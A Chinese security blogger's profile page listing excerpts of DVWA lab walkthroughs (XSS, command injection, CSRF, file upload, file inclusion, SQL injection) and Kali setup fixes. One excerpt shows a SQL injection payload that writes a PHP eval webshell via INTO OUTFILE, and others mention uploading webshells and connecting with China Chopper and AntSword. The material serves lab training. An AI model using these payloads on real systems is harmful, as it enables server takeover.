- 博客(17)
- 资源 (4)
- 问答 (5)
- 收藏
- 关注
RSS订阅原创 DVWA-DOM型XSS全等级绕过方法
DOM型XSS全等级绕过前言一、LOW级别二、Medium级别图片插入语句法三、High级别字符 # 绕过服务端过滤四、Impossible级别前言 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Do
2020-12-30 01:27:19
3280
7
原创 DVWA命令注入(Command_Injection)全等级绕过方法
DVWA命令注入(Command Injection)前言一、Low级别解决命令注入乱码问题二、Medium级别命令连接符"&&","&","||" 和 "|"的含义三、High级别四、Impossible级别 命令注入就是通过Web程序,在服务器上,拼接系统命令。装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。
2020-12-24 01:48:18
3807
3
原创 命令注入-命令的连接符【‘&’‘&&’‘||’‘|’】的含义及其用法
命令的连接符【‘&’‘&&’‘||’‘|’】的含义及其用法一、各个连接符的含义二、用法演示1.a && b2.a & b3.a || b4.a | b一、各个连接符的含义a && b :代表首先执行前者命令a再执行后命令b,但是前提条件是命令a执行正确才会执行命令b,在a执行失败的情况下不会执行b命令。所以又被称为短路运算符。(前面的命令执行成功后,它后面的命令才被执行)a & b:代表首先执行命令a再执行命令b,如果a执行失败
2020-12-24 01:26:52
8080
原创 DVWA命令注入(Command_Injection)出现乱码解决办法
DVWA命令注入(Command_Injection)出现乱码今天在做命令注入测试的时候,发现了这个乱码问题 通过查找资料,发现有一个dvwaPage.inc.php文件,修改277行,将UTF-8改为GBK或者GB2312即可。 文件位置在…/DVWA/dvwa/includes目录下。 我的文件路径:C:\phpStudy\PHPTutorial\WWW\
2020-12-23 20:07:31
2484
原创 DVWA-CSRF跨站请求伪造全等级绕过方法
CSRF--DVWA全等级绕过前言一、low级别二、Medium级别三、High级别四、Impossible级别总结前言CSRF,跨站请求伪造,Cross-site request forgery受害者:用户在当前已登录的Web应用程序上执行非本意的操作。攻击者:攻击者欺骗浏览器,让其以受害者的名义执行自己想要的操作。一、low级别二、Medium级别三、High级别四、Impossible级别总结 本站所有文章均为原创,欢迎转载,请注明文章
2020-12-17 20:36:14
3670
原创 kali启动谷歌浏览器Chrome(命令行启动+非命令行)
文章目录前言一、命令行启动Google Chrome二、不用命令行启动前言 kali系统安装谷歌浏览器并启动的教程可以参考:Kali Linux安装谷歌浏览器Chrome.一、命令行启动Google Chromegoogle-chrome --no-sandbox 二、不用命令行启动 如果不想一直使用命令启动,可以在usr/share/applications中找到Chrome的快捷方式&nb
2020-12-13 23:04:58
6619
2
原创 DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)
DVWA文件上传前言一、low级别1.1 一句话木马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别前言 文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。一、low级别打开dvwa,File Upload 会看到有红色报错,具体解决办法请参考我的
2020-12-13 22:37:49
12207
1
原创 DVWA-文件包含全等级绕过方法
dvwa文件包含File Inclusion全等级绕过前言一、Low级别1.1分析文件包含漏洞测试网页1.2 构造URL暴露重要信息1.3 测试本地脚本运行1.4 测试远程脚本运行1.5 包含一句话木马文件,并用菜刀连接1.5.1 一句话木马1.6 上菜刀二、Medium级别2.1双写绕过2.2大小写绕过2.3 绝对路径绕过三、High级别3.1 file协议包含本地文件来进行绕过四、impossible级别分析总结前言 文件包含漏洞:开发人员为了使代码更灵
2020-12-13 03:21:58
4026
2
原创 mysql:1130 is not allowed to connect to this MariaDB server解决办法
MySQL 1130错误,无法远程连接一、先打开phpstudy,打开phpMyAdmin二、打开mysql数据库,user表,Host选项,并将localhost更改为% mysql:1130 is not allowed to connect to this MariaDB server一、先打开phpstudy,打开phpMyAdmin二、打开mysql数据库,user表,Host选项,并将localhost更改为% &n
2020-12-13 02:39:39
2715
原创 DVWA文件包含报错The PHP function allow_url_include is not enabled.的解决方法
解决方法前言一、修改php配置文件二、重启mysql和apache服务前言 打开File Inclusion,发现红色报错内容The PHP function allow_url_include is not enabled.(PHP函数allow_url_include未启用)。一、修改php配置文件 /etc/php/7.4/apache2/ 文件夹cd /etc/php/7.4/apache2/
2020-12-13 02:18:31
8712
5
原创 DVWA文件上传出现Incorrect folder permissions&The PHP module GD is not installed.的解决方法
文章目录前言一、解决办法:1.设置文件夹权限2.安装php-gd前言 打开FileUpload的时候看到有红色的报错信息如上图所示: 报错一:Incorrect folder permissions: /var/www/html/dvwa/hackable/uploads/Folder is not writable.文件夹权限不正确:Folder is not writable.文件夹不可写。 
2020-12-13 02:02:47
5568
2
原创 SQL注入写入一句话php(outfile方式)&中国菜刀连接
通过SQL注入漏洞上传一句话木马前言一、先读取数据库路径二、写入一句话木马1.关闭windows系统防护三、上菜刀前言具体sql注入漏洞和一句话木马原理以及sql语句这里不做讲解,直接开门见山以dvwa的low级别为例一、先读取数据库路径1' union select @@datadir,2#二、写入一句话木马1' union select 1,"<?php eval($_POST[wang]);?>" into outfile 'C:/phpStudy/PHPTutorial
2020-12-13 01:44:56
3746
原创 Kali Linux安装及启动谷歌浏览器Chrome
提示:首先要确保当前用户为root权限要下载Google Chrome的debian安装包因为kali系统,实际上就是debian的魔改版安装步骤一、下载Google Chrome的debian安装包二、安装gdebi三、安装 Google Chrome四、启动 Google Chrome一、下载Google Chrome的debian安装包wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
2020-12-13 00:33:04
5466
3
原创 kali无法执行默认网络浏览器输入/输出错误解决办法
无法执行默认浏览器解决办法出现这个问题一般是因为你安装了别的浏览器,冲突了解决办法解决办法是打开设置管理打开首选应用程序将你的默认浏览器重新设置为火狐,就行了这个时候再打开,就没问题了 本站所有文章均为原创,欢迎转载,请注明文章出处: .。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。...
2020-12-13 00:18:21
7417
3
原创 Burp Suite抓不了DVWA本地包localhost127.0.0.1的解决办法
Burp Suite抓不了dvwa包的解决办法一、浏览器设置代理二、修改登录地址一、浏览器设置代理首选项>网络设置>设置打开Burp Suite,并且要先确认浏览器已经打开了代理可以发现,无论在dvwa里怎么输入,Burp Suite都抓不了包二、修改登录地址解决的办法是:我们不要用127.0.0.1的本地ip去登录dvwa
2020-12-03 11:27:26
6554
4
原创 存储型XSS(Stored)DVWA全等级绕过方法
dvwa_存储型XSS全等级演示一、low级别绕过前端限制,修改输入长度二、Medium级别三、High级别四、dvwa_impossible分析一、low级别打开dvwa靶场,将等级设置为low,选中XSS(Stored)这里有一个很明显的特征就是表单,遇到这种情况最好每个表单都输入内容,即XSS测试语句先查看源码(View Source):<?phpif( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message =
2020-12-01 21:07:04
3709
5
原创 Navicat连接kali数据库时,登录出现Access denied for user ‘root‘@‘localhost‘ (using password YES) 拒绝访问
方法步骤出现access denied的原因有如下可能:1)mysql的服务器停止2)用户的端口号或者IPnmap方法ufw3)mysql的配置文件错误4)root用户的密码错误出现access denied的原因有如下可能:1)mysql的服务器停止重启mysql服务:service mysql restart2)用户的端口号或者IPnmap方法查看端口号是否开启可以用kali自带的nmap假设你的ip地址是192.168.43.129:nmap 192.168.43.129uf
2020-12-01 09:26:32
2854
maven项目中的依赖版本不一致问题
2023-07-25
关于idea打包jar的问题,如何解决?
2023-05-26
为什么mac电脑上面的ping命令ping dnslog.cn没有dns记录?
2023-04-21
Java-Httpclient如何输出请求成功和失败的特征?
2022-10-10
急!!Java的jar包如何代码混淆防止反编译?
2022-04-24
急!请问java的jsoup爬虫如何完整获得响应验证码?
2022-04-21
java控制台输出如何转textarea输出?
2022-02-26
JAVA中break OUT无法跳出外部死循环该如何解决?
2021-12-21
XSS过滤了关键字符如何绕过
2021-05-11
TA创建的收藏夹 TA关注的收藏夹
TA关注的人